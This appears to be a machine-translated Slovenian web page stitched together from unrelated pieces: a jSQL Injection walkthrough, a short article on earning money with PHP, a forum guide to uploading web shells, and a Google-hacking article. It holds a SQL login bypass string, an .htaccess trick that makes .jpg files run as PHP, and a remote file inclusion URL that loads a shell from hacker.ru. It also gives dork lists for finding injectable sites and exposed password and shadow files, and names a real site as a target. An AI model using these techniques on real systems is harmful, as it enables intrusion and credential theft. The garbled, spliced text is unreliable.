Inurl php chapter num osebni račun. Kako zaslužiti z znanjem PHP? Ne pozabimo na očitno

Zaženite preneseno datoteko z dvoklikom (imeti morate navidezni stroj ).

3. Anonimnost pri preverjanju mesta za vbrizgavanje SQL

Nastavitev Tor in Privoxy v Kali Linux

[Razdelek v razvoju]

Nastavitev Tor in Privoxy v sistemu Windows

[Razdelek v razvoju]

Nastavitve strežnika proxy v jSQL Injection

[Razdelek v razvoju]

4. Preverjanje mesta za vbrizgavanje SQL z jSQL Injection

Delo s programom je izjemno preprosto. Samo vnesite naslov spletne strani in pritisnite ENTER.

Naslednji posnetek zaslona prikazuje, da je spletno mesto ranljivo za tri vrste vbodov SQL (informacije o njih so navedene v spodnjem desnem kotu). S klikom na imena injekcij lahko zamenjate uporabljeno metodo:

Prav tako so se nam že prikazale obstoječe baze podatkov.

Ogledate si lahko vsebino vsake tabele:

Običajno so pri tabelah najbolj zanimive poverilnice skrbnika.

Če imate srečo in najdete podatke skrbnika, je še prezgodaj za veselje. Še vedno morate najti skrbniško ploščo, kamor vnesete te podatke.

5. Poiščite skrbniške plošče z jSQL Injection

Če želite to narediti, pojdite na naslednji zavihek. Tukaj nas pozdravi seznam možnih naslovov. Za preverjanje lahko izberete eno ali več strani:

Udobje je v tem, da vam ni treba uporabljati drugih programov.

Na žalost ni prav veliko malomarnih programerjev, ki shranjujejo gesla v čistem besedilu. Pogosto v vrstici za geslo vidimo nekaj podobnega

8743b52063cd84097a65d1633f5c74f5

To je hash. Dešifrirate ga lahko s surovo silo. In ... jSQL Injection ima vgrajen brute forcer.

6. Zgoščevanje s surovo silo z uporabo jSQL Injection

Nedvomno udobje je, da vam ni treba iskati drugih programov. Obstaja podpora za številne najbolj priljubljene zgoščene vrednosti.

To ni najbolj najboljša možnost. Če želite postati guru pri dekodiranju hash-jev, priporočamo knjigo "" v ruščini.

Seveda pa, ko pri roki ni drugega programa ali ni časa za učenje, bo jSQL Injection z vgrajeno funkcijo brute force prišel zelo prav.

Obstajajo nastavitve: nastavite lahko, kateri znaki so vključeni v geslo, obseg dolžine gesla.

7. Datotečne operacije po zaznavi vbrizgavanja SQL

Poleg operacij z bazami podatkov - branjem in spreminjanjem le-teh, če so zaznane injekcije SQL, je mogoče izvesti naslednje operacije datotek:

  • branje datotek na strežniku
  • nalaganje novih datotek na strežnik
  • nalaganje lupin na strežnik

In vse to je implementirano v jSQL Injection!

Obstajajo omejitve - strežnik SQL mora imeti privilegije za datoteke. Tisti razumni sistemski skrbniki so onemogočeni in dostop do datotečni sistem ne bo mogel dobiti.

Prisotnost privilegijev datoteke je precej preprosto preveriti. Pojdite na enega od zavihkov (branje datotek, ustvarjanje lupine, nalaganje nove datoteke) in poskusite izvesti eno od navedenih operacij.

Še ena zelo pomembna opomba - poznati moramo točno absolutno pot do datoteke, s katero bomo delali - sicer nič ne bo delovalo.

Oglejte si naslednji posnetek zaslona:

Na vsak poskus operacije z datoteko prejmemo naslednji odgovor: Ni privilegija FILE(brez pravic do datoteke). In tukaj se ne da narediti nič.

Če imate namesto tega drugo napako:

Težava pri zapisovanju v [ime_imenika]

To pomeni, da ste napačno določili absolutno pot, kamor želite zapisati datoteko.

Če želite uganiti absolutno pot, morate poznati vsaj operacijski sistem, v katerem deluje strežnik. Če želite to narediti, preklopite na zavihek Omrežje.

Tak zapis (vrstica Win64) daje razlog za domnevo, da imamo opravka z operacijskim sistemom Windows:

Keep-Alive: timeout=5, max=99 Strežnik: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Povezava: Keep-Alive Metoda: HTTP/1.1 200 OK Content-Length: 353 Datum: Pet, 11. december 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; nabor znakov=UTF-8

Tukaj imamo nekaj Unix (*BSD, Linux):

Transfer-Encoding: chunked Datum: pet, 11. december 2015 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Povezava: keep-alive Content-Type: text/html X- Powered by: PHP/5.3.29 Strežnik: Apache/2.2.31 (Unix)

In tukaj imamo CentOS:

Metoda: HTTP/1.1 200 OK Poteče: četrtek, 19. november 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Povezava: keep-alive X-Cache-Lookup: MISS iz t1.hoster.ru:6666 Strežnik: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS iz t1.hoster.ru Nadzor predpomnilnika: brez shranjevanja, brez predpomnilnika, obvezno ponovno preverjanje, naknadno preverjanje=0, predhodno preverjanje=0 Pragma: brez predpomnilnika Datum: petek, 11. december 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

V sistemu Windows je tipična mapa za spletna mesta C:\Server\data\htdocs\. Toda v resnici, če je nekdo "mislil" narediti strežnik v sistemu Windows, potem ta oseba zelo verjetno ni slišala ničesar o privilegijih. Zato poskusite začeti neposredno iz imenika C:/Windows/:

Kot vidite, je bilo prvič vse v redu.

Toda lupine jSQL Injection same vzbujajo dvome. Če imate privilegije za datoteke, lahko preprosto naložite nekaj s spletnim vmesnikom.

8. Množično preverjanje mest za vbrizgavanje SQL

Tudi ta funkcija je na voljo v jSQL Injection. Vse je izjemno preprosto - prenesite seznam spletnih mest (lahko jih uvozite iz datoteke), izberite tiste, ki jih želite preveriti, in kliknite ustrezen gumb za začetek operacije.

Zaključek vbrizgavanja jSQL

jSQL Injection je dobro, zmogljivo orodje za iskanje in nato uporabo SQL injekcij, ki jih najdemo na spletnih mestih. Njegove nedvomne prednosti: enostavna uporaba, vgrajene povezane funkcije. jSQL Injection lahko postane najboljši prijatelj nov v analizi spletnih strani.

Med pomanjkljivostmi bi izpostavil nezmožnost urejanja baz podatkov (z vsaj Te funkcije nisem našel). Tako kot vsi instrumenti z grafični vmesnik, lahko eno od slabosti tega programa pripišemo nezmožnosti njegove uporabe v skriptih. Kljub temu je v tem programu možna tudi nekaj avtomatizacije - zahvaljujoč vgrajeni funkciji množičnega preverjanja spletnega mesta.

uveljavljen vzorec in potrdilo. Avtor: poseben popust za poljubne fakultete in smeri!

S prihodom računalnikov in interneta se je pojavilo veliko dodatnih poklicev.


Programerji so zdaj iskani, saj se prek interneta začenja veliko različnih projektov. Zato bi morali vsi kandidati razmisliti o izbiri specialnosti, povezane z računalniki.

Kako zaslužiti z znanjem PHP? V tem članku si bomo ogledali eno izmed področij programiranja. Skriptni jezik se aktivno uporablja za razvoj aplikacij.

Tehnologija je pomembna že vrsto let in če se naučite PHP, lahko dobro zaslužite. Najpomembneje pa je, da je povpraševanje po strokovnjakih na tem področju ogromno.

Koliko zasluži programer PHP?

Točnega zneska je nemogoče navesti, saj vsi delajo v različna podjetja, nekateri pa celo delajo od doma. Vsekakor pa aktivni delavci prejemajo dobro plačo.

Tisti, ki delajo, ne da bi šli od doma, prejmejo točno toliko, kolikor jim uspe izpolniti naročil. Cene v niši se redko določajo;

Na pozitivni strani PHP deluje Kot programer je treba opozoriti na resne možnosti in pomen dejavnosti. V času, ko internet prodira skoraj na vsa področja, je delo programerja res dobičkonosno.


V tem članku želim govoriti o najpogosteje uporabljenih metodah nalaganja lupine na spletno mesto. Spletna lupina je neke vrste zlonamerna skripta (program), ki jo napadalci uporabljajo za nadzor spletnih strani ali strežnikov.

1. metoda
Na spletni strani poiščite obrazec za nalaganje datotek/slik. Recimo, da nam ni uspelo vdreti v skrbniško ploščo spletnega mesta in poskušamo našo lupino preplaviti z razširitev.php.jpg .Če uspe, bomo namesto slike videli belo okno, kliknemo z desno miškino tipko in sledimo povezavi. V primeru okvare lahko uporabimo chrome razširitev podatke o spreminjanju. Omogoča vam prestrezanje in spreminjanje zahteve, kot želite. Če spletno mesto preveri pripono datoteke, lahko najprej naložimo .htaccess datoteka z vsebino:
AddType application/x-httpd-php .jpg
Ta ukaz bo zadostoval datoteke jpg kot php.
Podrobna video navodila:

Video navodila za namestitev tamper podatkov:


Metoda 2
Uporabite program za iskanje skrbniških plošč na spletnem mestu - https://github.com/bdblackhat/admin-panel-finder. Ko program najde skrbniško ploščo, lahko poskusimo s sql-injection. V polje za prijavo in geslo spletnega mesta vnesemo kodo:

" ali "1"="1 " ALI 1=1/*

Če deluje, pridemo do skrbniške plošče in Nadaljujemo po metodi 1.Če v skrbniški plošči na spletnem mestu ni sql-injection, ga lahko poskusimo odpraviti ali najti izkoriščanje za ta CMS.
Podrobna video navodila:


3. metoda
Pri 3. metodi bomo iskali sql-injection na samem spletnem mestu. To lahko naredimo ročno ali pa uporabimo sqlmap. Na forumu je dovolj tem o tem, kako izvajati injekcije, zato bom prišel od daleč. Torej, zdaj smo že našli tabelo s skrbniškim imenom in geslom, dešifrirali zgoščene vrednosti, pojdite na skrbniško ploščo in se veselite. Toda recimo, da nismo mogli dešifrirati gesla in je šlo vse narobe, potem moramo preveriti privilegije našega uporabnika . Preverimo privilegije in naložimo mini lupino. Ko želim prilepiti kodo, mi spletno mesto iz neznanega razloga prikaže napako.

4. metoda
Metoda 4 vključuje napad csrf. V spodnji kodi moramo zamenjati http:// do naše ciljne povezave. Izberite lupino in pritisnite gumb nalaganje.



5. metoda
Izvedite več o svojem cilju in poiščite izkoriščanje. Za to obstaja zelo zanimiva spletna stran - https://www.exploit-db.com. Nihče ni preklical množičnega vdora v spletna mesta z ranljivostmi, vendar o tem že obstaja članek na obrazcu.

Obstaja veliko več načinov za polnjenje lupine in nima smisla govoriti o vsakem posebej. Če želite vaditi, potem namestite dvwa - to je program, zasnovan tako, da pomaga varnostnim strokovnjakom preizkusiti svoje sposobnosti in orodja v pravnem okolju.

6. metoda
Php injekcija- gre za obliko napada na spletno mesto, ko napadalec v napadeno PHP aplikacijo vstavi svojo kodo PHP.

www.site.ru?page=home.html
Z izvedbo ukaza bomo naložili stran home,html. Zdaj bomo poskusili naložiti zlonamerno lupino.
www.site.ru?page=http:/hacker.ru/webshell.php
Dork: Inurl:page=

Obstaja tudi način za iskanje že naložene lupine s perlom

In tako, zdaj vam bom povedal, kako nekaj vdreti brez posebnega znanja. Takoj bom rekel, da je od tega malo koristi, a vseeno.
Najprej morate poiskati sama spletna mesta. Če želite to narediti, pojdite na google.com in poiščite dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

tukaj je majhen seznam. Lahko uporabite svojega. In tako smo našli spletno stran. Na primer http://www.vestitambov.ru/
Nato prenesite ta program

**Skrita vsebina: če želite videti to skrito vsebino, mora biti število vaših objav 3 ali več.**

Kliknite OK. Nato vstavimo mesto žrtve.
Pritisnemo start. Nato čakamo na rezultate.
In tako je program našel ranljivost SQL.

Nato prenesite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= tja prilepite prejeto povezavo. Ne bom razlagal, kako uporabljati Havij in kje ga prenesti; Vse. Prejeli ste podatke, ki jih potrebujete - skrbniško geslo, potem pa je prepuščeno vaši domišljiji.

P.S. To je moj prvi poskus, da nekaj napišem. Oprosti, če je kaj narobe

Iskalnik sistem Google(www.google.com) ponuja številne možnosti iskanja. Vse te lastnosti so neprecenljivo iskalno orodje za novega uporabnika interneta in hkrati še močnejše orožje invazije in uničenja v rokah zlonamernih ljudi, med katerimi so ne le hekerji, ampak tudi neračunalniški kriminalci in celo teroristi.
(9475 ogledov v 1 tednu)

Denis Barankov
denisNOSPAMixi.ru

Pozor:Ta članek ni vodnik za ukrepanje. Ta članek je bil napisan za vas, skrbnike SPLETNIH strežnikov, da boste izgubili lažen občutek, da ste varni in da boste končno razumeli zahrbtnost tega načina pridobivanja informacij ter se lotili varovanja vaše strani.

Uvod

Na primer, našel sem 1670 strani v 0,14 sekunde!

2. Vnesemo drugo vrstico, npr.

inurl:"auth_user_file.txt"

malo manj, vendar je že to dovolj za brezplačen prenos in ugibanje gesla (z istim Johnom The Ripperjem). Spodaj bom navedel več primerov.

Torej se morate zavedati, da je iskalnik Google obiskal večino internetnih strani in predpomnil informacije, ki jih vsebujejo. Te predpomnjene informacije vam omogočajo, da pridobite informacije o spletnem mestu in vsebini spletnega mesta brez neposredne povezave s spletnim mestom, le tako, da se poglobite v informacije, ki so shranjene v Googlu. Poleg tega, če informacije na spletnem mestu niso več na voljo, se lahko informacije v predpomnilniku še vedno ohranijo. Vse, kar potrebujete za to metodo: vedeti nekaj ključne besede Google. Ta tehnika se imenuje Google Hacking.

Informacije o vdiranju v Google so se prvič pojavile na poštnem seznamu Bugtruck pred 3 leti. Leta 2001 je to temo sprožil francoski študent. Tukaj je povezava do tega pisma http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Ponuja prve primere takih poizvedb:

1) Indeks /admin
2) Indeks /gesla
3) Index of /mail
4) Kazalo / +banques +filetype:xls (za Francijo ...)
5) Indeks / +passwd
6) Kazalo / password.txt

Ta tema je v angleško branem delu interneta razvnela šele pred kratkim: po članku Johnnyja Longa, objavljenem 7. maja 2004. Za popolnejšo študijo o hekanju v Googlu vam svetujem, da obiščete spletno stran tega avtorja http://johnny.ihackstuff.com. V tem članku vas želim samo seznaniti.

Kdo lahko to uporablja:
- Novinarji, vohuni in vsi tisti ljudje, ki radi vtikajo nos v tuje posle, lahko to uporabijo za iskanje obremenilnih dokazov.
- Hekerji, ki iščejo primerne tarče za vdiranje.

Kako deluje Google.

Za nadaljevanje pogovora naj vas spomnim na nekatere ključne besede, ki se uporabljajo v Googlovih poizvedbah.

Iščite z znakom +

Google iz iskanj izloči besede, ki se mu zdijo nepomembne. Na primer vprašalne besede, predlogi in členki v angleški jezik: na primer so, od, kje. V ruščini se zdi, da Google šteje vse besede za pomembne. Če je beseda izključena iz iskanja, Google o tem piše. Za Google je začelče želite poiskati strani s temi besedami, morate pred besedo dodati znak + brez presledka. Na primer:

as +osnove

Išči z znakom –

Če Google najde veliko število strani, s katerih mora izločiti strani z določeno tematiko, lahko prisilite Google, da išče samo strani, ki ne vsebujejo določenih besed. Če želite to narediti, morate te besede označiti tako, da pred vsako postavite znak - brez presledka pred besedo. Na primer:

ribolov - vodka

Išči z uporabo ~

Morda boste želeli iskati ne le po določeni besedi, ampak tudi po njenih sopomenkah. Če želite to narediti, pred besedo postavite simbol ~.

Iskanje natančne fraze z dvojnimi narekovaji

Google na vsaki strani išče vse pojavitve besed, ki ste jih napisali v poizvedbenem nizu, in ga ne zanima relativni položaj besed, dokler so vse navedene besede na strani hkrati (to je privzeto dejanje). Če želite najti točno frazo, jo morate dati v narekovaje. Na primer:

"knjige"

Da se prikaže vsaj ena od navedenih besed, morate določiti logično delovanje izrecno: ALI. Na primer:

varnost knjige ALI zaščita

Poleg tega lahko uporabite znak * v iskalni vrstici, da označite katero koli besedo in. za predstavljanje katerega koli lika.

Iskanje besed z uporabo dodatni operaterji

obstajati iskalni operaterji, ki so navedeni v iskalnem nizu v obliki:

operator:iskalni_izraz

Presledki poleg dvopičja niso potrebni. Če za dvopičjem vstavite presledek, boste videli sporočilo o napaki, pred njim pa jih bo Google uporabil kot običajen iskalni niz.
Obstajajo skupine dodatnih iskalnih operaterjev: jeziki - navedite, v katerem jeziku želite videti rezultat, datum - omejite rezultate za zadnjih tri, šest ali 12 mesecev, pojavitve - navedite, kje v dokumentu želite iskati vrstica: povsod, v naslovu, v URL-ju, domene - poiščite na določenem mestu ali, nasprotno, izključite ga iz iskanja - blokira mesta, ki vsebujejo določeno vrsto informacij, in jih odstrani s strani z rezultati iskanja.
Vendar pa nekateri operaterji ne zahtevajo dodatnega parametra, na primer zahteve " predpomnilnik: www.google.com" lahko imenujemo kot polnopravni iskalni niz, nekatere ključne besede pa nasprotno zahtevajo iskalno besedo, na primer " site:www.google.com pomoč". V luči naše teme si poglejmo naslednje operaterje:

Operater

Opis

Potrebujete dodaten parameter?

išči samo na spletnem mestu, navedenem v search_term

išči samo v dokumentih z vrsto search_term

poiščite strani, ki vsebujejo search_term v naslovu

poiščite strani, ki vsebujejo vse besede search_term v naslovu

najti strani, ki v naslovu vsebujejo besedo search_term

najti strani, ki vsebujejo vse besede search_term v svojem naslovu

Operater spletno mesto: omejuje iskanje samo na določeno spletno mesto in lahko določite ne samo Domena, temveč tudi naslov IP. Vnesite na primer:

Operater vrsta datoteke: Iskanje omeji na določeno vrsto datoteke. Na primer:

Od datuma objave članka lahko Google išče v 13 različnih formatih datotek:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint(ppt)
  • Microsoft Word(dok)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Oblika obogatenega besedila (rtf)
  • Shockwave Flash(swf)
  • Besedilo (ans, txt)

Operater povezava: prikaže vse strani, ki kažejo na navedeno stran.
Verjetno je vedno zanimivo videti, koliko mest na internetu ve za vas. Poskusimo:

Operater predpomnilnik: Prikazuje različico spletnega mesta v Googlovem predpomnilniku, kot je bilo videti zadnjič, ko je Google obiskal to stran. Vzemimo katero koli spletno mesto, ki se pogosto spreminja, in poglejmo:

Operater naslov: išče določeno besedo v naslovu strani. Operater allintitle: je razširitev - išče vseh določenih nekaj besed v naslovu strani. Primerjaj:

naslov: polet na Mars
intitle:let intitle:on intitle:mars
allintitle:let na mars

Operater inurl: prisili Google, da prikaže vse strani, ki vsebujejo podani niz v URL-ju. operator allinurl: išče vse besede v URL-ju. Na primer:

allinurl:acid acid_stat_alerts.php

Ta ukaz je še posebej uporaben za tiste, ki nimajo SNORT-a - lahko vsaj vidijo, kako deluje v realnem sistemu.

Metode vdiranja z uporabo Googla

Tako smo ugotovili, da lahko s kombinacijo zgornjih operaterjev in ključnih besed vsakdo zbira potrebne informacije in išče ranljivosti. Te tehnike se pogosto imenujejo Google Hacking.

Zemljevid strani

Operator site: lahko uporabite za seznam vseh povezav, ki jih je Google našel na spletnem mestu. Običajno strani, ki so dinamično ustvarjene s skripti, niso indeksirane z uporabo parametrov, zato nekatera spletna mesta uporabljajo filtre ISAPI, tako da povezave niso v obliki /article.asp?num=10&dst=5, in s poševnicami /article/abc/num/10/dst/5. To se naredi tako, da spletno mesto na splošno indeksirajo iskalniki.

Poskusimo:

spletno mesto: www.whitehouse.gov bela hiša

Google meni, da vsaka stran na spletnem mestu vsebuje besedo bela hiša. To uporabljamo za pridobitev vseh strani.
Obstaja tudi poenostavljena različica:

spletno mesto: whitehouse.gov

In najboljše pri tem je, da tovariši iz whitehouse.gov sploh niso vedeli, da smo pogledali strukturo njihove strani in celo pogledali predpomnjene strani, ki jih je prenesel Google. To je mogoče uporabiti za preučevanje strukture spletnih mest in ogled vsebine, ki zaenkrat ostane neodkrita.

Oglejte si seznam datotek v imenikih

Spletni strežniki lahko prikažejo sezname imenikov strežnikov namesto običajnih HTML strani. To se običajno naredi zato, da uporabniki izberejo in prenesejo določene datoteke. Vendar v mnogih primerih skrbniki nimajo namena prikazati vsebine imenika. To se zgodi zaradi nepravilne konfiguracije strežnika ali pomanjkanja domača stran v imeniku. Posledično ima heker možnost najti nekaj zanimivega v imeniku in ga uporabiti za svoje namene. Če želite najti vse te strani, je dovolj, da opazite, da vse vsebujejo besede: indeks of. Ker pa kazalo besed ne vsebuje samo takšnih strani, moramo poizvedbo izboljšati in upoštevati ključne besede na sami strani, zato poizvedbe, kot so:

naslov:index.nadrejenega imenika
intitle:index.of velikost imena

Ker je večina seznamov imenikov namernih, boste morda težko prvič našli napačne sezname. Toda vsaj že lahko uporabite sezname za določitev SPLETNE različice strežnik, kot je opisano spodaj.

Pridobitev različice WEB strežnika.

Pred kakršnim koli hekerskim napadom je vedno koristno poznati različico spletnega strežnika. Še enkrat, zahvaljujoč Googlu lahko te informacije dobite brez povezave s strežnikom. Če pozorno pogledate seznam imenikov, lahko vidite, da sta tam prikazana ime spletnega strežnika in njegova različica.

Apache1.3.29 - strežnik ProXad na trf296.free.fr vrata 80

Izkušen skrbnik lahko te podatke spremeni, vendar so praviloma resnični. Tako je za pridobitev teh informacij dovolj, da pošljete zahtevo:

intitle:index.of server.at

Za pridobitev informacij za določen strežnik pojasnimo zahtevo:

intitle:index.of server.at site:ibm.com

Ali obratno, iščemo delujoče strežnike posebna različica strežniki:

intitle:index.of Apache/2.0.40 Strežnik na

To tehniko lahko heker uporabi za iskanje žrtve. Če ima na primer exploit za določeno različico WEB strežnika, potem ga lahko najde in preizkusi obstoječi exploit.

Različico strežnika lahko dobite tudi tako, da si ogledate strani, ki so privzeto nameščene ob namestitvi zadnje različice SPLETNEGA strežnika. Na primer, videti testna stran Apache 1.2.6 samo vnesite

intitle:Test.Page.for.Apache je.delovalo!

Poleg tega nekateri OS Med namestitvijo takoj namestijo in zaženejo WEB strežnik. Nekateri uporabniki pa se tega niti ne zavedajo. Seveda, če vidite, da nekdo ni odstranil privzete strani, potem je logično domnevati, da računalnik sploh ni bil podvržen nobeni prilagoditvi in ​​je verjetno ranljiv za napade.

Poskusite poiskati strani IIS 5.0

allintitle:Dobrodošli v internetnih storitvah Windows 2000

V primeru IIS lahko določite ne samo različico strežnika, ampak tudi Različica sistema Windows in servisni paket.

Drug način za določitev različice spletnega strežnika je iskanje priročnikov (strani za pomoč) in primerov, ki so morda privzeto nameščeni na spletnem mestu. Hekerji so našli kar nekaj načinov za uporabo teh komponent za pridobitev privilegiranega dostopa do spletnega mesta. Zato morate te komponente odstraniti na proizvodnem mestu. Da ne omenjam dejstva, da je prisotnost teh komponent mogoče uporabiti za pridobivanje informacij o vrsti strežnika in njegovi različici. Na primer, poiščimo priročnik za apache:

inurl: ročni moduli direktiv apache

Uporaba Googla kot skenerja CGI.

CGI skener ali WEB skener je pripomoček za iskanje ranljivih skriptov in programov na strežniku žrtve. Ti pripomočki morajo vedeti, kaj iskati, za to imajo cel seznam ranljivih datotek, na primer:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Vsako od teh datotek lahko najdemo z z uporabo Googla, pri čemer poleg imena datoteke v iskalni vrstici uporabimo še besede index of ali inurl: najdemo lahko mesta z ranljivimi skripti, na primer:

allinurl:/random_banner/index.cgi

Z uporabo dodatnega znanja lahko heker izkoristi ranljivost skripta in s to ranljivostjo prisili skript, da odda katero koli datoteko, shranjeno na strežniku. Na primer datoteka z geslom.

Kako se zaščititi pred vdori v Google.

1. Ne objavljajte pomembnih podatkov na SPLETNI strežnik.

Tudi če ste podatke objavili začasno, lahko nanje pozabite ali pa bo nekdo imel čas, da te podatke poišče in vzame, preden jih izbrišete. Ne delaj tega. Obstaja veliko drugih načinov za prenos podatkov, ki jih ščitijo pred krajo.

2. Preverite svoje spletno mesto.

Za raziskovanje svojega spletnega mesta uporabite opisane metode. Občasno preverite svoje spletno mesto za nove metode, ki se pojavljajo na spletnem mestu http://johnny.ihackstuff.com. Ne pozabite, da če želite avtomatizirati svoja dejanja, morate od Googla pridobiti posebno dovoljenje. Če pozorno berete http://www.google.com/terms_of_service.html, boste videli besedno zvezo: Googlovemu sistemu ne smete pošiljati kakršnih koli samodejnih poizvedb brez izrecnega vnaprejšnjega dovoljenja Googla.

3. Morda ne boste potrebovali Google za indeksiranje vašega spletnega mesta ali njegovega dela.

Google vam omogoča, da odstranite povezavo do vašega spletnega mesta ali njegovega dela iz njegove zbirke podatkov, pa tudi odstranitev strani iz predpomnilnika. Poleg tega lahko prepoveš iskanje slik na svojem spletnem mestu, prepoveš prikazovanje kratkih fragmentov strani v rezultatih iskanja. Vse možnosti za brisanje spletnega mesta so opisane na strani http://www.google.com/remove.html. Če želite to narediti, morate potrditi, da ste res lastnik te strani ali vstaviti oznake na stran oz

4. Uporabite robots.txt

Znano je, da iskalniki pogledajo datoteko robots.txt, ki se nahaja v korenu spletnega mesta, in ne indeksirajo tistih delov, ki so označeni z besedo Disallow. To lahko uporabite, da preprečite indeksiranje dela spletnega mesta. Če želite na primer preprečiti indeksiranje celotnega spletnega mesta, ustvarite datoteko robots.txt, ki vsebuje dve vrstici:

Uporabniški agent: *
Disallow: /

Kaj se še zgodi

Da se vam življenje ne bo zdelo sladko, bom na koncu rekel, da obstajajo spletna mesta, ki spremljajo tiste ljudi, ki z zgoraj opisanimi metodami iščejo luknje v skriptih in spletnih strežnikih. Primer takšne strani je

Aplikacija.

Malo sladko. Poskusite sami nekaj od naslednjega:

1. #mysql dump filetype:sql - iskanje izpisov baze podatkov podatkov mySQL
2. Poročilo o povzetku ranljivosti gostitelja - pokazalo vam bo, katere ranljivosti so odkrili drugi ljudje
3. phpMyAdmin, ki se izvaja na inurl:main.php - to bo prisilno zaprlo nadzor prek plošče phpmyadmin
4. ni za distribucijo zaupno
5. Podrobnosti zahteve Spremenljivke strežnika nadzornega drevesa
6. Zagon v otroškem načinu
7. To poročilo je ustvaril WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – morda kdo potrebuje konfiguracijske datoteke požarnega zidu? :)
10. intitle:index.of finances.xls – hmm....
11. intitle:Kazalo klepetov dbconvert.exe – dnevniki klepetov icq
12.intext: Analiza prometa Tobiasa Oetikerja
13. intitle:Statistika uporabe za Generated by Webalizer
14. naslov: statistika napredne spletne statistike
15. intitle:index.of ws_ftp.ini – konfiguracija ws ftp
16. inurl:ipsec.secrets hrani skupne skrivnosti - tajni ključ - dobra najdba
17. inurl:main.php Dobrodošli v phpMyAdmin
18. inurl:server-info Informacije o strežniku Apache
19. site:edu admin ocene
20. ORA-00921: nepričakovan konec ukaza SQL – pridobivanje poti
21. intitle:index.of trillian.ini
22. naslov: Kazalo pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Kazalo .mysql_history
27. naslov:indeks intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:izvedi filetype:ini

  • "Hekanje z Googlom"
